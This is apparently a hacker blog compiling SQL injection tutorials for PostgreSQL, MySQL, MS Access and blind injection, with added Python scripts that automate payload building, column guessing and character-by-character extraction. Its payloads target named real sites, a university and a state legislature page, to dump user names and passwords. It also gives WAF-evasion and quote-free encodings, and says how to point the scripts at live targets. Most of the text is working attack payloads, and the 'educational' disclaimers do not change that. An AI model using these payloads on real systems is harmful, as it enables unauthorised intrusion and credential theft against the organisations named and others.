Wednesday, February 19, 2014

PostgreSQL Injection

NOTE: This tutorial is for educational purposes only.

You can verify this vulnerability, and identify the database engine behind the page (as Net_Spy, a good SQL injector, put it), from the error it leaks:

Errors
MySQL: the word "MySQL" in the error
MS SQL: "SQL" in the error (SQL Server / Native Client messages)
Oracle: an "ORA-" error code
MS Access: a "Jet" (Microsoft JET Database Engine) error
PostgreSQL: Warning: pg_exec () [function.pg-exec] (the PHP pg_* functions)

In our case, though, the page comes back blank rather than with an error, which is the worst case for fingerprinting. Some PostgreSQL basics first:

|| is the string concatenation operator in PostgreSQL (just like Oracle).
LIMIT works as in MySQL, but rows are stepped through with OFFSET (LIMIT 1 OFFSET n) rather than LIMIT n,1, because the page only displays one row at a time.

The rest is much the same as MySQL.

Now the column count.
It is found the same way as in MySQL, MSSQL and Oracle: ORDER BY n, increasing n until the page errors.

Comments in PostgreSQL
-- This is a standard SQL comment
/* this is
 * multiline comments syntax
 */

Casting in PostgreSQL
CAST ( 'string' AS type ), or the shorthand 'string'::type

Now let's inject the site.
With ORDER BY we learned that there are 8 columns in the SELECT statement before the UNION.

Now UNION SELECT with 8 columns.
Here we use NULL as the placeholder, as with MSSQL or Oracle, because we don't know the column data types: unlike MySQL, PostgreSQL enforces matching types across a UNION, and NULL is compatible with every type.
So replace one NULL at a time with a string; the string shows up in the page when that column is a text type (char/varchar/text) and the page displays it.

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,'Ch3rnoby1 Black Hat',null,null,null,null,null,null--+

Now for version():
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,version(),null,null,null,null,null,null--+

For the database names (from the pg_database catalog):

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,datname,null,null,null,null,null,null from pg_database--+

If this shows only one database name, step through the rows one at a time with LIMIT 1 OFFSET n, like this:

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,datname,null,null,null,null,null,null from pg_database LIMIT 1 OFFSET 1--+
Now keep increasing the OFFSET to find the other databases. OFFSET skips that many rows and LIMIT 1 returns a single row, so:
eg
LIMIT 1 OFFSET 0 =====> first database (same as LIMIT 1 alone)
LIMIT 1 OFFSET 1 =====> second database
LIMIT 1 OFFSET 2 =====> third database

The first row can also be fetched with no OFFSET at all:

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,datname,null,null,null,null,null,null from pg_database LIMIT 1--+
Note that increasing LIMIT by itself (LIMIT 2, LIMIT 3) returns more rows, but the page still only displays the first one, so it is the OFFSET that has to change.

Now enumerating table names.
This lists the tables of every schema in the current database (a PostgreSQL connection cannot read the tables of other databases):

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,table_name,null,null,null,null,null,null from information_schema.tables--+

To see only the tables of the current schema (normally public, where the application tables live), use:

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,table_name,null,null,null,null,null,null from information_schema.tables where table_schema=current_schema()--+

Now column names.
This lists the columns of every table in every schema of the current database:

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,column_name,null,null,null,null,null,null from information_schema.columns--+


To see only the columns of one specific table:

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,column_name,null,null,null,null,null,null from information_schema.columns where table_name='portal_user'--+
If the quoted 'portal_user' doesn't work (quotes escaped or filtered), build the string from CHR() calls joined with ||, exactly as in Oracle: chr(112)||chr(111)||chr(114)||... for 'portal_user'.
PostgreSQL has no MySQL-style 0x... literal, so you cannot drop a bare hex value into the query anywhere (tested; check for yourself). CHR() concatenation, or dollar quoting ($$portal_user$$), are the quote-free alternatives.


Now dumping data.
This is the same as Oracle: concatenate the columns with ||.
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,(user_name||'::::'||user_password),null,null,null,null,null,null from portal_user--+
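The steps above (NULL padding for the 8-column UNION, CHR() encoding when quotes are filtered, and walking LIMIT 1 OFFSET n until nothing comes back) as a small payload builder. This is an added example, not code from the tutorial; the column count, the echoed column position and the fake list of database names are assumptions, and the fetch function is a stub standing in for the HTTP request.

```python
import re
from typing import Callable, List, Optional

def pg_chr(s: str) -> str:
    """Encode a string as chr(..)||chr(..) so the payload needs no quote characters.
    PostgreSQL has no 0x.. literal, so this (or dollar quoting) is the quote-free form."""
    return "||".join(f"chr({ord(c)})" for c in s)

def pg_dollar(s: str) -> str:
    """The other quote-free literal form: PostgreSQL dollar quoting."""
    return f"$${s}$$"

def union_payload(expr: str, table: Optional[str] = None, where: Optional[str] = None,
                  offset: Optional[int] = None, ncols: int = 8, visible: int = 2) -> str:
    """Build ' UNION SELECT ... with NULL in every slot except the column the page echoes.
    NULL is used because PostgreSQL enforces matching types across the UNION.
    ncols=8 and visible=2 are assumptions taken from the tutorial's target."""
    if not 1 <= visible <= ncols:
        raise ValueError("visible column out of range")
    cols = ["null"] * ncols
    cols[visible - 1] = expr
    sql = f"' UNION SELECT {','.join(cols)}"
    if table:
        sql += f" FROM {table}"
    if where:
        sql += f" WHERE {where}"
    if offset is not None:
        # one row per request: keep LIMIT 1 and move OFFSET, never raise LIMIT
        sql += f" LIMIT 1 OFFSET {offset}"
    return sql + "--"

def enumerate_rows(expr: str, table: str, fetch: Callable[[str], Optional[str]],
                   where: Optional[str] = None, max_rows: int = 50) -> List[str]:
    """Walk LIMIT 1 OFFSET n until the page stops echoing a value.
    fetch(payload) returns the echoed string or None (an HTTP client in practice)."""
    out: List[str] = []
    for n in range(max_rows):
        value = fetch(union_payload(expr, table, where, offset=n))
        if value is None:
            break
        out.append(value)
    return out

def columns_of(table: str, fetch: Callable[[str], Optional[str]]) -> List[str]:
    """Column names of one table, with the table name CHR()-encoded (no quotes needed)."""
    return enumerate_rows("column_name", "information_schema.columns", fetch,
                          where=f"table_name={pg_chr(table)}")

# Constructed stand-in for the vulnerable page: pretends it echoes the n-th row
# of a fake pg_database. Replace with a real request function for a live test.
FAKE_DBS = ["postgres", "template1", "template0", "portal"]

def stub_fetch(payload: str) -> Optional[str]:
    m = re.search(r"OFFSET (\d+)", payload)
    i = int(m.group(1)) if m else 0
    return FAKE_DBS[i] if i < len(FAKE_DBS) else None

if __name__ == "__main__":
    print(union_payload("version()"))
    print(columns_of("portal_user", stub_fetch))
    print(enumerate_rows("datname", "pg_database", stub_fetch))
```

Against a real target, fetch() would request the URL with the payload appended after deptid=66 (URL-encoded, with the trailing -- followed by a space or +) and return whatever text appears in the echoed column.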


for reference
http://www.postgresql.org/docs/8.0/static/sql-syntax.html

Tutorial By Pk Injector

SQL Injection 1024 Bypass

NOTE: This tutorial is for educational purposes only.

1024 character limit bypass, classic syntax

MySQL's GROUP_CONCAT() output is cut off at group_concat_max_len, which is 1024 bytes by default. Instead of GROUP_CONCAT, the query below appends to a user variable (@y) once per row inside a subquery, so the whole listing comes back in one value with no 1024 limit:

(select (@y) from (select (@y:=0x00), (select (0) from(information_schema.columns) where (table_schema!='information_schema') and (0x00) in (@y:=concat(@y,'<br>',table_schema,'-->',table_name,'-->',column_name))))x)



Quote-free version (hex literals instead of quoted strings), for when quotes are escaped by magic_quotes_gpc or addslashes() and no WAF is in the way:

(select (@y) from (select (@y:=0x00), (select (0) from(information_schema.columns) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@y:=concat(@y,0x3c62723e,table_schema,0x3a3a3a,table_name,0x3a3a3a,column_name))))x)



The same with a simple WAF in the way: keywords are wrapped in MySQL version comments (/*!00000select*/ is executed by every server version) and an empty comment splits information_schema./**/columns, so naive keyword filters miss them:

(/*!00000select*/ (@y) /*!from*/ (/*!00000select*/ (@y:=0x00), (/*!00000select*/ (0) /*!from*/(information_schema./**/columns) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@y:=concat(@y,0x3c62723e,table_schema,0x3a3a3a,/*!table_name*/,0x3a3a3a,/*!column_name*/))))x)


Dump a whole table without a WAF (replace dbname.table_name and the column names; the @ user variable is accumulated one row at a time in the same way):

(select(@) from(select(@:=0x00) ,(select (@) from(dbname.table_name)where(@) in (@:=concat (0x20,@, username ,0x203a3a20, name ,0x203a3a20, email_id ,0x203a3a20, hash_link ,0x3c62723e))))a)



Dump a whole table with a simple WAF:

(/*!00000select*/(@) /*!from*/(/*!00000select*/(@:=0x00) ,(/*!00000select*/ (@) /*!from*/(dbname.table_name)where(@) in (@:=concat (0x20,@, column1 ,0x203a3a20, column2 ,0x203a3a20, column3 ,0x203a3a20, column4 ,0x203a3a20, column5,0x3c62723e))))a)
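The hex encoding and the comment wrapping used in the variants above, as an added example (not the tutorial's or MakMan's code): it converts a quoted payload into the quote-free form, wraps keywords in version comments, and generalises the "dump whole table" query to any database, table and column list. The database and column names in the demo call are placeholders.

```python
import re
from typing import List

def mysql_hex(s: str) -> str:
    """MySQL 0x.. literal for a string: no quotes, so addslashes()/magic_quotes cannot break it."""
    return "0x" + s.encode("utf-8").hex()

def mysql_unhex(literal: str) -> str:
    """Decode a 0x.. literal back to text (handy for reading someone else's payload)."""
    if not literal.startswith("0x"):
        raise ValueError("not a 0x literal")
    return bytes.fromhex(literal[2:]).decode("utf-8")

def hexify_strings(sql: str) -> str:
    """Rewrite every 'single-quoted' string in a payload as a 0x literal."""
    return re.sub(r"'([^']*)'", lambda m: mysql_hex(m.group(1)), sql)

def version_comment_wrap(sql: str) -> str:
    """Wrap SELECT/FROM in /*!00000 ... */ version comments: MySQL executes the
    contents (version 0 is always satisfied) while filters that strip comments skip them."""
    return re.sub(r"\b(select|from)\b", lambda m: "/*!00000" + m.group(0) + "*/", sql, flags=re.I)

def dump_payload(db: str, table: str, columns: List[str],
                 sep: str = " :: ", row_sep: str = "<br>") -> str:
    """Generalised 'dump whole table' query: every row is appended to the user
    variable @y inside the subquery, so group_concat_max_len never applies.
    The WHERE test (0x00 in (@y:=...)) is only there to force the assignment per row."""
    fields = ("," + mysql_hex(sep) + ",").join(columns)
    return (f"(select(@y) from(select(@y:=0x00),(select(0) from({db}.{table}) "
            f"where(0x00) in (@y:=concat(@y,{fields},{mysql_hex(row_sep)}))))x)")

if __name__ == "__main__":
    classic = "table_schema!='information_schema'"
    print(hexify_strings(classic))
    print(version_comment_wrap(dump_payload("dbname", "table_name", ["username", "email_id"])))
```

Drop the result into the column position that the page echoes; the row separator is HTML so the listing renders line by line in the browser.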

Tutorial By Pk Injector with thanks to MakMan

MS Access SQLi

NOTE: This tutorial is for educational purposes only.
Quick Guide for MS Access Injection
Greetings to all,

Today I'm going to discuss MS Access injection, which is rare and a bit weird too. Hardly any websites still use it.

Introduction

MS Access is commonly thought of as the little brother of database engines, and not a lot of material has been published about methods for exploiting it during a penetration test. MS Jet is often mistakenly thought of as another name for MS Access, when in fact it is a database engine shipped as part of the Windows OS. MS Jet was, however, the core database engine used by MS Access up to version 2007. Since version 2007, MS Access has included a separate updated engine known as the Access Connectivity Engine. Although MS Jet is not as complex as more advanced databases such as SQL Server or Oracle, it is still commonly used by smaller web sites that want quick and easy database storage.

Default Tables Used In Access

Note: table names marked with * can be read from a query by a normal user (handy as the FROM table in a UNION); the others are normally not readable.

Access 97
MSysAccessObjects *
MSysACEs
MSysModules
MSysModules2 *
MSysObjects
MSysQueries
MSysRelationship

Access 2000
MSysAccessObjects *
MSysAccessXML *
MSysACEs
MSysObjects
MSysQueries
MSysRelationships


Access 2002-2003
MSysAccessStorage *
MSysAccessXML *
MSysACEs
MSysObjects
MSysQueries
MSysRelationships


Access 2007
MSysAccessStorage *
MSysACEs
MSysComplexColumns
MSysComplexType_Attachment
MSysComplexType_Decimal
MSysComplexType_GUID
MSysComplexType_IEEEDouble
MSysComplexType_IEEESingle
MSysComplexType_Long
MSysComplexType_Short
MSysComplexType_Text
MSysComplexType_UnsignedByte
MSysNavPaneGroupCategories *
MSysNavPaneGroups *
MSysNavPaneGroupToObjects *
MSysNavPaneObjectIDs *
MSysObjects
MSysQueries
MSysRelationships


As we can see, each version has some new default tables, and each behaves differently. MS Access injection is a real pain: there is no schema to query (no information_schema), so every table and column name has to be guessed. Access also does not support error-based injection and has no global variable like @@version, so the version is inferred from which default tables exist.

Column Enumeration and Union

We will use # to comment out the rest of the query instead of -- or /*.

Step-1

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103

The site above is vulnerable to SQL injection; let's see what error we get:

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103'

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
  [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'DISTRICTNUMBER = 103''.
   /h_reps/members.asp, line 16

Step-2

Using ORDER BY to get the column count.

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 1# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 2# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 3# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 4# <== No error
We increment by 1 until we get an error:
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 35# <== Error

That means there are 34 columns in total. Let's proceed with UNION.

If we are not sure about the data types we can use NULL instead of integers.

Step-3

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from MSysAccessObjects#

We used a default table name from the MS Access 2000 list above, because Access requires a FROM clause in every SELECT.
Now on your screen you can see some numbers right under the page contents, like 17 19 20 ...

The most common table names to try are:
users
admin
administrator
login
customers
user
members
member
customer

Step-4: Finding a table

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members#

The page loads normally, so we have found a valid table. Now let's enumerate its columns.

Step-5: Getting columns

We use GROUP BY and HAVING: the page errors if the named column does not exist and loads normally if it does. Columns already found are kept in the list while the next one is guessed, for example:

GROUP BY tablename.column1 having 1=1#
GROUP BY tablename.column1,column2 having 1=1#
GROUP BY tablename.column1,column2,column(n).... having 1=1#

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members group by members.id having 1=1#


The page loads without any error, so id exists. Now put "id" in place of one of the column numbers we saw on screen:

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,id,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members#


We get the following data:
Code:
COMMITTEE ASSIGNMENTS
102

Now let's get the next column:

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members group by members.id,now having 1=1#


The page loads without any error. Now put "now" in place of one of the column numbers we saw on screen:

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,now,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members#


We get the following data. Note that now is also the name of Access's built-in Now() function, which is why a timestamp comes back rather than stored data: the GROUP BY test cannot tell a column from a function name. A genuine column, like id above, returns the row's value.
Code:
COMMITTEE ASSIGNMENTS
4/15/2011 3:06:13 PM
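The whole Access procedure (ORDER BY to count columns, UNION against guessed table names, GROUP BY ... HAVING 1=1 to confirm columns one at a time) automated against a stand-in page. This is an added example, not the tutorial's code: Access is not needed to exercise the logic, so an in-memory SQLite database with a constructed 34-column table plays the vulnerable page, and the oracle only reports "page loaded" or "page errored". The # trailer and the MSys tables are Access-specific and are left out of the stub.

```python
import sqlite3
from typing import Callable, List, Optional

NCOLS = 34  # assumption: the page's SELECT has 34 columns, as in the tutorial

def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the target: 'reps' is the page's own table,
    'members' is the table whose name and columns the attacker has to guess."""
    con = sqlite3.connect(":memory:")
    cols = ", ".join(f"c{i} TEXT" for i in range(1, NCOLS))
    vals = ", ".join(f"'v{i}'" for i in range(1, NCOLS))
    con.execute(f"CREATE TABLE reps (id INTEGER, {cols})")
    con.execute(f"INSERT INTO reps VALUES (103, {vals})")
    con.execute("CREATE TABLE members (id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO members VALUES (1, 'alice', 'hunter2')")
    return con

def make_oracle(con: sqlite3.Connection) -> Callable[[str], bool]:
    """page_ok(injection) is True when the page would render without a SQL error."""
    def page_ok(injection: str) -> bool:
        try:
            con.execute(f"SELECT * FROM reps WHERE id = 103 {injection}").fetchall()
            return True
        except sqlite3.Error:
            return False
    return page_ok

def count_columns(page_ok: Callable[[str], bool], limit: int = 100) -> int:
    """ORDER BY n succeeds up to the real column count and errors one past it."""
    n = 1
    while n <= limit and page_ok(f"ORDER BY {n}"):
        n += 1
    return n - 1

def _numbers(ncols: int) -> str:
    return ",".join(str(i) for i in range(1, ncols + 1))

def find_table(page_ok: Callable[[str], bool], ncols: int, candidates: List[str]) -> Optional[str]:
    """First guessed table name for which UNION SELECT 1..n FROM table loads cleanly."""
    for table in candidates:
        if page_ok(f"UNION SELECT {_numbers(ncols)} FROM {table}"):
            return table
    return None

def find_columns(page_ok: Callable[[str], bool], ncols: int, table: str,
                 candidates: List[str]) -> List[str]:
    """GROUP BY every column found so far plus the next guess; a bad name errors out."""
    found: List[str] = []
    for col in candidates:
        group = ",".join(f"{table}.{c}" for c in found + [col])
        if page_ok(f"UNION SELECT {_numbers(ncols)} FROM {table} GROUP BY {group} HAVING 1=1"):
            found.append(col)
    return found

if __name__ == "__main__":
    ok = make_oracle(build_db())
    n = count_columns(ok)
    table = find_table(ok, n, ["users", "admin", "administrator", "login", "members"])
    print(n, table, find_columns(ok, n, table, ["id", "email", "username", "password"]))
```

Against a real Access target, page_ok would issue the HTTP request with the injection (plus the # trailer) and return False when the ODBC error text appears in the response.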


That's all, guys.

Special thanks to : Renorobert , N3t.Crack3R , Sho0ter

If you like this, do post your comments.

Tutorial By NET_Spy with Thnx to PK Injector 

Wednesday, November 20, 2013

Blind SQL Injection

NOTE: This tutorial is for educational purposes, to understand blind SQLi.

What is Blind SQLi
Blind SQL injection is used when a web application is vulnerable to SQL injection but the results of the injection are not visible to the attacker. The vulnerable page may not be one that displays data, but it displays differently depending on the result of a logical condition injected into the legitimate SQL statement for that page. This type of attack can be time-intensive because a new statement must be crafted for each bit recovered. There are several tools that automate these attacks once the location of the vulnerability and the target information have been established.
Blind SQLi Tutorial 



Let's start.
Suppose you want to test this website for blind SQLi:
http://site.com/index.php?id=5
When we request it, we see a page with articles, pictures, etc.
To test it for blind SQL injection:
http://www.site.com/index.php?id=5 and 1=1 <--- this is always true
and the page loads normally; that's fine.
Now the real test:
http://www.site.com/index.php?id=5 and 1=2 <--- this is false
If some text, picture or other content is missing from the returned page, the site is vulnerable to blind SQL injection.
1) Get the MySQL version
To get the version in a blind attack we use substring, i.e.
http://www.site.com/index.php?id=5 and substring(@@version,1,1)=4
This returns TRUE (page loads normally) if the MySQL major version is 4.
Replace 4 with 5; if that query returns TRUE, the version is 5, i.e.
http://www.site.com/index.php?id=5 and substring(@@version,1,1)=5
2) Test whether subselects work
We rely on subselects for everything that follows, so check them first, i.e.
http://www.site.com/index.php?id=5 and (select 1)=1
If the page loads normally, subselects work. Then we check whether we have access to mysql.user, i.e.
http://www.site.com/index.php?id=5 and (select 1 from mysql.user limit 0,1)=1
If the page loads normally we have access to mysql.user (the application connects with a highly privileged account), and later we can read files with load_file() and write them with INTO OUTFILE.
3) Check table and column names
This is the part where guessing is your best friend, i.e.
http://www.site.com/index.php?id=5 and (select 1 from users limit 0,1)=1
(limit 0,1 makes the subquery return exactly one row; this matters because a subselect compared like this must not return more than one row.)
If the page loads normally with no content missing, the table users exists.
If you get FALSE (some article missing), change the table name until you guess the right one.
Let's say we have found that the table name is users; now what we need is a column name.
As with the table name, we start guessing; as said before, try the common names for columns, i.e.
http://www.site.com/index.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
If the page loads normally we know the column is named password (if we get FALSE, try common names or just guess).
Here we concatenate 1 with the column password, then substring returns the first character (,1,1), which is always '1' when the column exists; if it does not exist the query errors and the page shows FALSE.
4) Pull data from the database
We found the table users with columns username and password, so we pull characters from them.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
This pulls the first character of username:password for the first user in the table users (0x3a is ':').
substring here returns the first character, 1 character in length; ascii() converts that character into its ASCII value, which is then compared with greater-than (>).
So if the ASCII value is greater than 80, the page loads normally (TRUE).
We keep raising the number until we get FALSE.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
We get TRUE, keep incrementing.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE again, higher.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
FALSE!
So the first character of the username is char(99). From an ASCII table, char(99) is the letter 'c'.
Now let's check the second character.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
Note that ,1,1 has changed to ,2,1 to get the second character (it now returns the second character, 1 character in length).
TRUE, the page loads normally, higher.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>107
FALSE, lower number.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>104
TRUE, higher.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>105
FALSE!
We know that the second character is char(105), which is 'i'. We have 'ci' so far.
Keep incrementing the position until you reach the end (when >0 returns FALSE there are no more characters, because ascii('') is 0).
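The character-by-character extraction above, automated: instead of stepping the threshold up one at a time, each character is binary-searched over the ASCII range with about seven requests, and the >0 test detects the end of the string. This is an added example, not the tutorial's code: an in-memory SQLite database with a constructed users row stands in for the vulnerable page (SQLite's unicode()/substr() play the role of MySQL's ascii()/substring()), and mysql_payload() produces the exact condition the tutorial appends to the URL for a real target.

```python
import sqlite3
from typing import Callable, Tuple

def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the target. The secret is chosen so the first two
    characters match the 'ci' the tutorial recovers by hand."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE articles (id INTEGER, body TEXT)")
    con.execute("INSERT INTO articles VALUES (5, 'some article')")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('cipher', 'p4ss')")
    return con

def make_oracle(con: sqlite3.Connection) -> Callable[[int, int], bool]:
    """page_ok(pos, n): True when the page renders normally, i.e. when
    ascii(substring(username:password, pos, 1)) > n holds.
    ifnull(..., 0) mirrors MySQL, where ascii('') past the end is 0."""
    def page_ok(pos: int, n: int) -> bool:
        row = con.execute(
            "SELECT body FROM articles WHERE id = 5 AND "
            "ifnull(unicode(substr((SELECT username||':'||password FROM users LIMIT 1), ?, 1)), 0) > ?",
            (pos, n)).fetchone()
        return row is not None
    return page_ok

def mysql_payload(pos: int, n: int) -> str:
    """The condition the tutorial appends to id=5 for a live MySQL target."""
    return (f"and ascii(substring((SELECT concat(username,0x3a,password) "
            f"from users limit 0,1),{pos},1))>{n}")

def extract(page_ok: Callable[[int, int], bool], max_len: int = 64) -> Tuple[str, int]:
    """Recover the string one character at a time; returns (text, requests made)."""
    out = []
    requests = 0
    for pos in range(1, max_len + 1):
        requests += 1
        if not page_ok(pos, 0):          # ascii value 0: past the end of the string
            break
        lo, hi = 1, 127                  # invariant: lo <= char <= hi
        while lo < hi:
            mid = (lo + hi) // 2
            requests += 1
            if page_ok(pos, mid):        # char > mid
                lo = mid + 1
            else:                        # char <= mid
                hi = mid
        out.append(chr(lo))
    return "".join(out), requests

if __name__ == "__main__":
    text, n = extract(make_oracle(build_db()))
    print(text, "in", n, "requests")
    print(mysql_payload(1, 80))
```

For a live target, page_ok would request index.php?id=5 with mysql_payload(pos, n) appended and return True when the content that disappears on "and 1=2" is present in the response; sqlmap does the same search for you once the injection point is known.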
There are some tools for Blind SQL Injection, i think sqlmap is the best
Regards.
Gujjar(pcp)
Credit goes to real Other